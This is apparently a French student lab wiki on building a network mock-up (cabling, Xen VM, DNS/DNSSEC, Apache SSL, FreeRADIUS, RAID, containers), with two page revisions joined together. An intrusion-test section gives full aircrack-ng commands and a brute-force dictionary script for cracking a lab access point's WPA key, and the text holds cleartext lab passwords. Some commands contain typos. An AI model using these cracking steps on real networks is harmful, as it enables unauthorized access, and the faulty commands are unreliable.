Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1500px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves<br />
<br />
ZONES INVERSES A FAIRE<br />
<br />
===DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/mods-enabled/eap.conf :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
== 5. Tests d'intrusion ==<br />
===Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi (wlp2s0) :<br />
<br />
$ airmon-ng start wlp2s0mon<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On le monte :</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=48809TP sysres IMA5sc 2018/2019 G72018-12-17T14:54:55Z<p>Mcreteur : /* 6. Réalisation */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1500px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves<br />
<br />
ZONES INVERSES A FAIRE<br />
<br />
===DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
